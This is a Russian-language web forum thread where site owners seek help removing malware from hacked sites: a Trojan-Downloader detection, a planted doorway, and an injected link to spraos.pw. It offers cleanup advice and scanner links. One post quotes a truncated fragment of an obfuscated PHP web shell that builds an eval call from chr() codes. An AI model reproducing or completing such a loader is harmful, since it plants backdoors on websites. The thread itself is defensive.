Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[Booker]

У меня ругается всё равно.

[boroda-max]

Запрашиваемый веб-адрес не может быть предоставлен
Веб-адрес:http://alla-doctor.info/
Заблокирован Веб-Антивирусом
Причина: опасный веб-адрес
Нажмите здесь, если считаете, что веб-страница заблокирована ошибочно.
Способ обнаружения: базы
Сообщение создано: 19:35:26

Так он и будет ругаться - пока Администратор не спишется с суппортом Касперского.....

[Balamut]

73dce75b0ef045f77e443a1beae076ff.php

покажите содержимое этого файла. Кто устанавливал, откуда и зачем?

[папа]

ко мне на сайт залили шелл
кто нибудь сталкивался?

[MIT]

Это не шелл, а дорвей.
Удали папку нафиг и сиди ищи подозрительные файлы (вне этой папки), меняй пароли и т.д...

[папа]

и сиди ищи подозрительные файлы

ну и как же я их найду?

[Zhenjka]

Здравствуйте.
Есть ли какой нибудь сервис по проверке сайта на вирус и эксплойты в скриптах? Просто есть один сайт на вордпрессе, асперский стал ругаться на загрузку ссылки spraos.pw. Просмотрел что есть в интернете, прошерстил, несколько файлов удалил посторонних, но все где то еще остался. Возможно дыра есть в самом стиле, который автор сам сварганил.
P.S. Сервисы, которые предлагают в интернете проверку сайтов ругаются только на фреймы ютуба.

[Garret_Dark]

Открываете исходный код страницы, где касперыч ругается, в браузере и ищите по "spraos.pw" если находите, то смотрите где размещена ссылка, далее удаляете ее из файлов форума (тут уже в зависимости от того где ссылка встраивается).
Меняете пароли на хосте, проверяетесь на вирусы и т.п.

Заодно проверьте для профилактики htaccess в корне сайта

[Zhenjka]

Garret_Dark, в том то и дело что нигде нет упоминания ссылки, искал уже. Ссылка зашифрована типа так

Код: Выделить всё

 <?php
 $auth_pass='818d0a0fd60532d7453a2b314167e6ef';preg_replace("/.*/".'e',chr(101).chr(118).chr(97).chr(108).chr(40).chr(103).chr(122).chr(105).

[MIT]

Есть вот такой вот "сканер": http://www.revisium.com/ai/
Для борьбы со школьниками вполне подходит.

[Zhenjka]

Нашел где этот вирус сидел, на сайте стоял вордпресс и опенкарт в качестве магазина. Магазин не пользовался и просто лежал на хостинге, даже был переименован в shop1. Переименовал каталог с магазином и касперский перестал ругаться.
Я только одного не пойму, вордпресс с опенкартом никак не были связаны но вирус вылазил на стартовой странице вордпресса.

[MAzZY]

Вот есть новый интересный сервис. http://webimho.ru/topic/5975/
Человек давно и плотно занимается лечение разных сайтовых взломов и заражений. Так что инструмент обещает быть хорошим. Если что-то непонятно - спрашивайте в той теме

[MIT]

Школьникам стало нечего делать. Пошли спасать мир, не иначе.
Пусть хоть XSS с главной уберёт, а то ну совсем не серьёзно.

[Zhenjka]

MIT, это вы кому?

[MIT]

Zhenjka, это я куда-то сквозь MAzZY в сторону Пыщ-Пыщ и его творения.